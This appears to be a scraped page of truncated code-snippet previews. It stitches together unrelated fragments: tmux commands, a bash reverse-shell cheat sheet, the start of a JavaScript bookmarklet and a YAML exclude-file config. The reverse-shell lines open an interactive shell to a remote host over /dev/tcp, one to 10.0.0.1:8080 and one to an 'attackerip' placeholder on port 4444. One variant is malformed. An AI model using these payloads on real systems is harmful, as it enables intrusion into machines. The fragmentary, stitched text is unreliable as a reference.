start new:
tmux
start new with session name:
tmux new -s myname
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
#bash alt 3 |
javascript: (function () { | |
function c() { | |
var e = document.createElement("link"); | |
e.setAttribute("type", "text/css"); | |
e.setAttribute("rel", "stylesheet"); | |
e.setAttribute("href", f); | |
e.setAttribute("class", l); | |
document.body.appendChild(e) | |
} | |
function h() { |
I've moved this to a repo as it's easier to see what's going on:
# Directories to exclude | |
exclude-dirs: | |
- SOMETHING | |
# Files to exclude | |
exclude-files: | |
- README.md | |
- .gitignore | |
- .pre-commit-config.yaml | |
- LICENSE |